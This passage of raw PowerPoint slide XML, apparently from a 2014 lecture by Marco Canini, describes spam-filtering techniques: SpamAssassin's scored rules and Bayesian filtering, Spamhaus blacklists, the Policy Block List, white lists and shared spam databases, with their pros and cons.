          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23992399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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SpamAssassin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the most effective spam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>positive/negative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>score</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hundred </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://spamassassin.apache.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>tests_3_3_x.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reinforce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>its own rules through Bayesian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="457200"/>
            <a:ext cx="1905000" cy="84413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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>xample</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1790805"/>
            <a:ext cx="8915400" cy="4461778"/>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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Black lists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Spamhaus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SBL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XBL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.spamhaus.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SBL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: IPs of known spam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>operators</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XBL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: IPs of hijacked systems relying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mail servers can use this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to decide the acceptance of electronic mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policy Block List</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database of end-user IP address ranges which should not be delivering unauthenticated SMTP email to any Internet mail server except those provided for specifically by an ISP for that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>customer’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cheap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to put into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>practice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Centralized and always up to date list to be effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>negative</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>White </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of blocking some emails, the reception is allowed only if the sender (domain, IP address, etc.) belongs to the white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cheap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to put into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>practice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorized senders must be known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>priori</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>positive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>atabase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database maintained on a centralized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check whether the received message appears in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The database is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shared</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Few false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>positive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
